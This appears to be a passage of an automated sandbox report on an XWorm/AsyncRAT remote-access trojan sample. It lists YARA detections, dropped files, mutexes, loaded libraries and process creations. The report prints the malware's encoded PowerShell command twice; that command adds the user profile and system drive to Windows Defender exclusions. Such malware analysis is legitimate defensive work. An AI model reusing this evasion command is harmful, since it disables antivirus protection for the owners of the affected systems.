Source: Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://musicart.xboxlive.com/9/5c6a4700-0000-0000-0000-000000000002/504/image.jpg
Source: Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://musicart.xboxlive.com/9/e74d4600-0000-0000-0000-000000000002/504/image.jpg
Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://musicimage.xboxlive.comtXBLWinClient/v10_music/configuration.xml
Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.7.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://settings-ssl.xboxlive.com/
Source: Music.UI.exe, 00000004.00000002.3633828425.000002CCD8DE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://settings-ssl.xboxlive.com/XBLWinClient/v10_music/configuration.xml
Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://settings-ssl.xboxlive.comPN
Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com
Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com/0
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | HTTPS traffic detected: 92.123.20.9:443 -> 192.168.2.4:49710 version: TLS 1.2

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Process information set: 01 00 00 00

              System Summary

              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04E3B570
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Code function: 3_2_00007FFC3DD988F2
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Code function: 3_2_00007FFC3DD97B46
              Source: test2.exe.bin.exe, 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs test2.exe.bin.exe
              Source: test2.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/27@2/3
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | File created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Mutant created: NULL
              Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Mutant created: \Sessions\1\BaseNamedObjects\cPb595uDpWLZU8ML
              Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8988:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | File created: C:\Users\user\AppData\Local\Temp\XClient.exe
              Source: test2.exe.bin.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: test2.exe.bin.exe | Virustotal: Detection: 69%
              Source: test2.exe.bin.exe | ReversingLabs: Detection: 80%
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit (graph_0-120)
              Source: unknown | Process created: C:\Users\user\Desktop\test2.exe.bin.exe "C:\Users\user\Desktop\test2.exe.bin.exe"
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
              Source: unknown | Process created: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
              Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: slc.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: policymanager.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: msvcp110_win.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: twinui.appcore.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: execmodelproxy.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: mrmcorer.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: windows.staterepositorycore.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: appxdeploymentclient.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: bcp47mrm.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: windows.ui.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: windowmanagementapi.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: inputhost.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\test2.exe.bin.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe | Section loaded: winmm.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: d3d11.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: sharedui.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: vccorlib140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: concrt140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: dxgi.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.xaml.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: coremessaging.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: bcp47langs.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: iertutil.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: dcomp.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: wintypes.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.staterepositorycore.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windows.ui.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: windowmanagementapi.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: textinputframework.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: coreuicomponents.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: ntmarta.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: inputhost.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: propsys.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: urlmon.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: srvcli.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: netutils.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: resourcepolicyclient.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: d3d10warp.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: dxcore.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: rometadata.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: d2d1.dll
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe | Section loaded: dwrite.dll
